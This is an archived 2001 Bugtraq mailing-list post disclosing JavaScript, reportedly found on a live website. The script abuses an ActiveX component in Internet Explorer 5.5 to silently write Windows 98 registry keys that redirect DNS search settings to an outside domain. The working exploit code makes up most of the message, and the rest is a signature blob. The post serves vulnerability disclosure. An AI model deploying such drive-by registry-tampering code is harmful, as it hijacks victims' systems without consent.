[22442] in bugtraq
javascript can write anything to windows98 registry
daemon@ATHENA.MIT.EDU (Marcin Jackowski)
Tue Aug 28 23:16:35 2001
Message-ID: <014501c12f9a$65d7e000$33bcfea9@jople.pl>
From: "Marcin Jackowski" <marcin@jackowski.net>
To: <bugtraq@securityfocus.com>
Date: Tue, 28 Aug 2001 10:21:10 +0200
MIME-Version: 1.0
Content-Type: multipart/signed;
boundary="----=_NextPart_000_0141_01C12FAB.283416E0";
protocol="application/x-pkcs7-signature";
micalg=SHA1
------=_NextPart_000_0141_01C12FAB.283416E0
Content-Type: text/plain;
charset="windows-1250"
Content-Transfer-Encoding: 7bit
here's code from
www.4y4y.net:88/ls.html
it can write any value to windows98 registry
solution: disable JavaScript in InternetExplorer
tested on IE5.5
Marcin Jackowski
---------------------------------------------------------------
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
rvers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
------=_NextPart_000_0141_01C12FAB.283416E0
Content-Type: application/x-pkcs7-signature;
name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="smime.p7s"
MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJAzCCAqEw
ggIKoAMCAQICAwVWIDANBgkqhkiG9w0BAQIFADCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl
c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsT
FENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAw
MC44LjMwMB4XDTAxMDczMDE4NTIxNVoXDTAyMDczMDE4NTIxNVowZTESMBAGA1UEBBMJSmFja293
c2tpMQ8wDQYDVQQqEwZNYXJjaW4xGTAXBgNVBAMTEE1hcmNpbiBKYWNrb3dza2kxIzAhBgkqhkiG
9w0BCQEWFG1hcmNpbkBqYWNrb3dza2kubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC7
drhRBNs8TTBAh8H/vISnnpCFG4cQ7rGYy3Pi0Yech+iAdOKUXG8RjzwMmImx3O2t0b1W7v2bxxqz
N4qPuQBwA5/opXu33DC6z5c2j0jyB2hHzymSaR4uHZmpSZPgu3VL6lBP56zBJJ+V1X+qjUbvzWbH
WejiR24rFxW3TwSAaQIDAQABozEwLzAfBgNVHREEGDAWgRRtYXJjaW5AamFja293c2tpLm5ldDAM
BgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBAgUAA4GBAEuGI6GyKFo+Ftj/LPwI9ru7XDqowEsRPdpH
yIUHGM8iN7lmXRlj5DAyMNeBcR7ct6wm0VcdRFzjx6wisKP2IjdDfeztERW6VENq2alW8JnO9rJc
VR2kyinz6MxoH+XKvyqCg/Q18soytPtz9uI1c+ClRKUhll6mVFPGRYfuFI1xMIIDKTCCApKgAwIB
AgIBDDANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2Fw
ZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3VsdGluZzEoMCYGA1UE
CxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMbVGhhd3RlIFBlcnNv
bmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVlbWFpbEB0aGF3dGUu
Y29tMB4XDTAwMDgzMDAwMDAwMFoXDTAyMDgyOTIzNTk1OVowgZIxCzAJBgNVBAYTAlpBMRUwEwYD
VQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0w
GwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwg
UlNBIDIwMDAuOC4zMDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA3jMypmPHCSVFPtJueCdn
gcXaiBmClw7jRCmKYzUqbXA8+tyu9+50bzC8M5B/+TRxoKNtmPHDT6Jl2w36S/HW3WGl+YXNVZo1
Gp2Sdagnrthy+boC9tewkd4c6avgGAOofENCUFGHgzzwObSbVIoTh/+zm51JZgAtCYnslGvpoWkC
AwEAAaNOMEwwKQYDVR0RBCIwIKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDEtMjk3MBIGA1Ud
EwEB/wQIMAYBAf8CAQAwCwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBBAUAA4GBAHMbbyZli/8VNEtZ
YortRL5Jx+gNu4+5DWomKmKEH7iHY3QcbbfPGlORS+HN5jjZ7VD0Omw0kqzmkpxuwSMBwgmn70uu
ct0GZ/VQby5YuLYLwVBXtewc1+8XttWIm7eiiBrtOVs5fTT8tpYYJU1q9J3Fw5EvqZa4BTxS/N3p
YgNIMIIDLTCCApagAwIBAgIBADANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNV
BAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29u
c3VsdGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UE
AxMbVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1m
cmVlbWFpbEB0aGF3dGUuY29tMB4XDTk2MDEwMTAwMDAwMFoXDTIwMTIzMTIzNTk1OVowgdExCzAJ
BgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEaMBgG
A1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRpZmljYXRpb24gU2VydmljZXMg
RGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3
DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEA1GnX1LCUZFtx6UfYDFG26nKRsIRefS0Nj3sS34UldSh0OkIsYyeflXtL734Zhx2G6qPd
uc6WZBrCFG5ErHzmj+hND3EfQDimAKOHePb5lIZererAXnbr2RSjXW56fAylS1V/Bhkpf56aJtVq
uzgkCGqYx7Hao5iR/Xnb5VrEHLkCAwEAAaMTMBEwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0B
AQQFAAOBgQDH7JJ+Tvj1lqVnYiqk8E0RYNBvjWBYYawmu1I1XAjPMPuoSpaKH2JCI4wXD/S6ZJwX
rEcp352YXtJsYHFcoqzceePnbgBHH7UNKOgCneSa/RP0ptl8sfjcXyMmCZGAc9AUG95DqYMl8uac
LxXK/qarigd1iwzdUYRr5PjRzneigTGCAf4wggH6AgEBMIGaMIGSMQswCQYDVQQGEwJaQTEVMBMG
A1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xDzANBgNVBAoTBlRoYXd0ZTEd
MBsGA1UECxMUQ2VydGlmaWNhdGUgU2VydmljZXMxKDAmBgNVBAMTH1BlcnNvbmFsIEZyZWVtYWls
IFJTQSAyMDAwLjguMzACAwVWIDAJBgUrDgMCGgUAoIG6MBgGCSqGSIb3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTAxMDgyODA4MjExMFowIwYJKoZIhvcNAQkEMRYEFCvviFGweStO
tDpaXE4nqg/bvTgbMFsGCSqGSIb3DQEJDzFOMEwwCgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCA
MA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMAcGBSsOAwIdMA0GCSqGSIb3
DQEBAQUABIGAuQhtY+tQ+2PBOwM8Ke5oRlzrPauzZUIfopz3ggJ4s72iFqxL1SzLDPIV9qGwrJw8
MKrEAiKq/5et9j3YsxMEmRLLTsqqOJtBbulZN9GtN68z+0B2AbNa3Y0JrxsZakp5+C0J9Va66ERv
jRw72xBD+oKvaVCqAadjwB2ry43nE0oAAAAAAAA=
------=_NextPart_000_0141_01C12FAB.283416E0--
